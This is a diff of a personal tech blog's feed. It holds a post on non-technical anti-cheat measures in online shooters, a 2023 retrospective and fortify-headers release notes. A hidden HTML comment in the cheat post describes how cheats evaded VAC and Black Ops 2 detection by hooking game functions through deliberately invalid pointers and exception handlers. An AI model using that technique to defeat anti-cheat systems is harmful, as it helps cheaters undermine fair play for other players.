+<li>To play ranked, one needs to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
+ which takes around 50h, give or take.</li>
+<li>The game has a rich ecosystem of cosmetics
+ that can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
+ and painstakingly earned by playing,
+ that would be lost in case of an account ban.</li>
+<li>Friendly fire will result in the damages being applied to the shooter
+ should it be reported as voluntary by the player at the receiving end.</li>
+<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
+ where people with a "positive" behaviour get rewarded (more experience
+ points, cosmetics, …), while those with a "negative" one
+ might be prevented from playing <em>ranked</em>,
+ get less experience points,
+ …</li>
+</ul>
+<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a>:</h3>
+<ul>
+<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
+<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
+ but this can be done in a couple of hours.</li>
+<li>Cheating results in account-wise permaban across all Call of Duty titles.</li>
+<li>Banned accounts have their records purged from leaderboards.</li>
+<li>Players engaging in "negative" behaviours might get
+ muted on chat/voice, … and interestingly, cheaters
+ are going to get paired with other cheaters in matchmaking.
+ <a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who are often playing with the same cheaters</a> (boosting),
+ will also get their reputation tanked.</li>
+</ul>
+<h3><a href="https://playvalorant.com/">Valorant</a></h3>
+<p>Its developer even published a
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blogposts</a> on
+what it calls "game health"</p>
+<ul>
+<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
+<li>Cheaters get a permaban, but people benefiting from them might get a 6 months one as well.</li>
+<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap out experience points</a>,
+ doing nothing but kneecapping their team will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
+<li>Players are encouraged to report toxic behaviours, and to not engage,
+ since engagement might be penalized as well</li>
+<li>Players using,
+ <a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>
+ whether in chat or as username,
+ will be flagged as toxic.</li>
+<li>Penalties come in various sizes, shapes and durations, allowing fine-tuning
+ according to behaviour: warnings, voice/chat restrictions,
+ reduction in experience points
+ gain, reduction in ranked rating, increased queue waiting time, ranking game
+ ban, global ban.</li>
+<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
+ their approach to mitigate smurfing; acknowledging that while having multiple accounts
+ to smurf/trade/evade bans/… is not desirable, some people are using
+ them to play with friends with a better/worse ranked level.
+ So while they took measures to detect and mitigate having multi-accounts,
+ they also relaxed the maximum ranks difference for players to play together,
+ which significantly reduced the number of alt-accounts usage,
+ but also didn't alter match fairness in a measurable way.</li>
+</ul>
+<h2>Conclusion</h2>
+<p>This is all nice and dandy, but is it working? According to
+data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>,
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
+… those measures are indeed working pretty well,
+and are likely providing better results than technical-only
+measures. They are also cheaper, since steering people away from toxic
+behaviours doesn't reduce the number of players as much as banning them
+outright. It's nice to see that the video game industry realised that cheating and
+abuses/toxicity could be addressed in similar non-technical ways, and that both
+approaches are complementary. This is a stark contrast to other ones,
+where techno-solutionism is seen as the only possible remedy, even more so
+in our machine-learning-all-the-things era. </p>
+<h2>Sources and resources</h2>
+<ul>
+<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
+<li><a href="https://secret.club/">Secret Club</a></li>
+<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
+</ul>
+<!--
+
+Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
+
+Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
+
+Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
+
+Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
+
+-->jvoisinFri, 12 Jan 2024 20:15:00 +0100tag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.htmlgames2023 in retrospecthttps://dustri.org/b/2023-in-retrospect.html<p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
+<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
+<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
+<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
+<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Read a couple of books:<ul>
+<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
+<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
+<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
+<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Ball episodes with a quicker pace.</li>
+<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
+ dodecalogy. The last chapter of the final book deserved a book on its own,
+ instead of being speedrunned in ~30 pages.</li>
+</ul>
+</li>
+<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
+<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
+<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
+<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
+<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
+<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
+<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
+<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
+<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
+<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
+<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
+<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
+<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
+<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
+<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworker's jobs and struggles.</li>
+<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
+ deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
+ <a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
+ typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
+ was expecting more of a description of an alternative history than a
+ novel with a lame plot and forgettable characters. The humour is goofy
+ and unsubtle: a punk rock group called Green Desert has an anti-war
+ anthem named "Arabian Idiot"; a morning talk show called Jazeera &
+ Friends, … but this is completely on par with the post-11-September
+ anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
+</ul>
+</li>
+<li>Moved back to France.</li>
+<li>Volunteered at a library.</li>
+<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
+<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
+<li>Attended some concerts:<ul>
+<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
+<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
+<li><a href="https://katatonia.com">Katatonia</a>, along with
+ <a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
+<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
+ <a href="https://trivium.org">Trivium</a>,
+ <a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
+ <a href="https://obituary.cc">Obituary</a></li>
+<li><a href="https://igorrr.com">Igorrr</a>, along with
+ <a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
+ <a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
+ <a href="http://hangmanschair.com">Hangman's Chair</a></li>
+</ul>
+</li>
+<li>Played some video games:<ul>
+<li>On a computer:<ul>
+<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">>observer_</a>: didn't like it.</li>
+<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
+<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
+<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
+<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
+<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
+<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
+<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing resident evil again <3</li>
+<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video games get so long…</li>
+<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
+<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
+ <a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
+<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
+ <a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
+<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performances for looking utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
+<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
+ jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
+<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
+ fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons & Dragons</a> dice-based
+ gameplay, nor of the hard dialog choices cutting entire parts of the game,
+ but still an amazing game.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
+ so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
+ <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
+ I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
+ Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
+</ul>
+</li>
+<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
+<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
+ zombie-related game.</li>
+<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
+ surprisingly "wholesome".</li>
+<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
+<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
+ I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
+<li>Contributed to a couple of software:<ul>
+<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
+<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
+<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&repo=&arch=&maintainer=Julien%20Voisin">package maintainer</a></li>
+<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
+ and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
+</ul>
+</li>
+<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
+<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
+<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
+</ul>
+</li>
+<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
+<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
+<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">bazarr</a>, making it work on Alpine Linux.</li>
+<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
+ including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
+<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
+ resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
+<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
+ used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
+ OSS-Fuzz</a>.</li>
+<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
+by doing a lot of code reviews for pull-requests, and landing some modules,
+ like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
+ courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
+<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
+ <a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
+ on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
+ and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
+</ul>
+</li>
+<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
+<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
+<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
+<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
+<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
+<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
+<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
+ under my usual nickname.</li>
+<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
+ given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
+<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
+ hardening-related compiler flags were enabled by default by popular Linux
+ distributions.</li>
+<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
+ an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
+ around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
+<li>Got featured a couple of times on Hacker News/reddit/lobste.rs/… frontpage,
+ thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
+ marketing-able <a href="https://dijit.sh">friend</a></li>
+<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
+ We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
+ of tor's exit traffic! Our little non-profit is now 10 years old.</li>
+<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
+ <a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
+ It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
+ and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
+<li>Ported my resume/cover letter template from
+ <a href="https://latex-project.org">LaTeX</a> to
+ <a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
+ much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
+ to never have to touch it again.</li>
+<li>Got a "Documented Feedback from Employee Relations" from HR at work for
+ saying "Awkward to have yet another middle aged rich white het guy come talk
+ about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
+ aged rich white het guy</a>
+ invited to give an internal talk about diversity and inclusion.</li>
+</ul>jvoisinSun, 31 Dec 2023 23:59:00 +0100tag:dustri.org,2023-12-31:/b/2023-in-retrospect.htmlmiscfortify-headers 2.1https://dustri.org/b/fortify-headers-21.html<p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions into their proper files</li>
+<li>Add a missing include in <code>sys/select.h</code></li>
+<li>Do not use static inline for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a>-wise violation</li>
+<li>Guard some conditional stdio APIs with the right macros</li>
+<li>Fix a typo that would prevent C++ code from compiling correctly</li>
+<li>Rename macros to be more namespace-friendly</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Including parts from the
+<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
+programs that don't correctly include everything they need might compile, even
+though they shouldn't. Fortunately, the only bits used are either:</p>
+<ul>
+<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
+ since it's by definition the type returned by <code>sizeof</code>.</li>
+<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
+ (defined as 16), ...</li>
+<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
+ whose usage we hide behind an <code>#ifdef</code>.</li>
+</ul>
+<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>, the usage of <code>static
+inline</code> while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
+is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
+In C++, if a function is declared inline, it must be declared inline in every translation unit, and also every
+definition of an inline function must be exactly the same (while in C they may
+be different.) On the other hand, C++ allows non-const function-local
+statics and all function-local statics from different definitions of an inline
+function are the same in C++, but distinct in C.
+More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
+the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
+unit</a> results
+in undefined behaviour. The fix is easy, and was
+<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">committed</a>
+by <a href="https://github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
+<p>Thanks <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time to look at
+C++ compatibility, <a href="https://github.com/q66">q66</a> for his patches, willingness to ship
+fortify-headers in Chimera, and becoming co-maintainer.</p>jvoisinSat, 16 Dec 2023 20:30:00 +0100tag:dustri.org,2023-12-16:/b/fortify-headers-21.htmlsecurityfortify-headers 2.0https://dustri.org/b/fortify-headers-20.html<p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the project wasn't maintained
+anymore. But he would be happy to give me the commit bit instead. I spent
+some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
+accepting, to see if it would be a good idea: Would I be able to maintain it?
+To improve it? Add more features? and so on. Turns out the answer is yes, and
+I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
+2.0</a>!</p>
+<h2>Changelog</h2>
+<ul>
+<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
+<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
